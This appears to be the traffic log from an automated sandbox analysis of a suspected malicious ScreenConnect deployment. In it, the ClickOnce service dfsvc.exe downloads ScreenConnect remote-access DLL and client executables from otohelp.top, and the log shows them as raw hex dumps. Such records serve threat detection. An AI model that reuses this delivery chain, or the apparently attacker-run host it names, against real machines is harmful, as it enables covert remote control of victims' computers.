                                                                                                                                                2024-10-02 04:25:30 UTC16384INData Raw: 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4
                                                                                                                                                Data Ascii: '--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
                                                                                                                                                2024-10-02 04:25:30 UTC16384INData Raw: 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e
                                                                                                                                                Data Ascii: ityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionIn
                                                                                                                                                2024-10-02 04:25:30 UTC2776INData Raw: 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68
                                                                                                                                                Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                10192.168.2.64973679.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:31 UTC89OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:31 UTC218INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 1721856
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:31 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:31 UTC16166INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
                                                                                                                                                2024-10-02 04:25:31 UTC16384INData Raw: 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35
                                                                                                                                                Data Ascii: ((,o*4.s0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:( |Os(n,5
                                                                                                                                                2024-10-02 04:25:31 UTC16384INData Raw: fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f
                                                                                                                                                Data Ascii: }}*}{(}{(-*{*s{z2{*0<{3{(NoO3}+sM{}*(S*z(,}(NoO}**0{,;*}%X
                                                                                                                                                2024-10-02 04:25:31 UTC16384INData Raw: 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56
                                                                                                                                                Data Ascii: n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
                                                                                                                                                2024-10-02 04:25:31 UTC16384INData Raw: c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd
                                                                                                                                                Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
                                                                                                                                                2024-10-02 04:25:31 UTC16384INData Raw: 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69
                                                                                                                                                Data Ascii: [4E_9<J_FX9iXq7q6YA>)L|1hS![9L|95pj|(Y;k=L[TID%*/ 49>Qbuzdi
                                                                                                                                                2024-10-02 04:25:31 UTC16384INData Raw: 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f
                                                                                                                                                Data Ascii: >9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__
                                                                                                                                                2024-10-02 04:25:31 UTC16384INData Raw: 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c
                                                                                                                                                Data Ascii: baseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHel
                                                                                                                                                2024-10-02 04:25:31 UTC16384INData Raw: 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e
                                                                                                                                                Data Ascii: p<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.
                                                                                                                                                2024-10-02 04:25:31 UTC16384INData Raw: 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79
                                                                                                                                                Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                11192.168.2.64973779.110.49.164436456C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-02 04:25:33 UTC95OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                Host: otohelp.top
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                2024-10-02 04:25:33 UTC217INHTTP/1.1 200 OK
                                                                                                                                                Cache-Control: private
                                                                                                                                                Content-Length: 601376
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Wed, 02 Oct 2024 04:25:33 GMT
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-02 04:25:33 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
                                                                                                                                                2024-10-02 04:25:33 UTC16384INData Raw: 00 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a
                                                                                                                                                Data Ascii: *0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o*(J{o(%o
                                                                                                                                                2024-10-02 04:25:33 UTC16384INData Raw: 02 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b
                                                                                                                                                Data Ascii: {To.{To*0b{To,M{Z(o{To{T{Toto&{To{(<*(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
                                                                                                                                                2024-10-02 04:25:34 UTC16384INData Raw: 73 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00
                                                                                                                                                Data Ascii: s'(+(+o(*()~*(+ `(,s-(.*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}
                                                                                                                                                2024-10-02 04:25:34 UTC16384INData Raw: 00 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63
                                                                                                                                                Data Ascii: ,(*o*0Q(a-((b,(*{,((b,(*o*(a-(,(*{,(,(*o*(a-(,(*{,(,(*(*0(o(c
                                                                                                                                                2024-10-02 04:25:34 UTC16384INData Raw: 08 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01
                                                                                                                                                Data Ascii: *2{8o*6{8o*0){:(t|:(O+3*0){:(t|:(O+3*0)Z{:s%{9X}9o(P+*f}9({8o*(*2{8o*2{8(r
                                                                                                                                                2024-10-02 04:25:34 UTC16384INData Raw: 7b 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30
                                                                                                                                                Data Ascii: {=,{=o"{<,{<o",o"(`&*4iA5$0J( "(,("?}s~(s}ts}q*0){x(t|x(+3*0
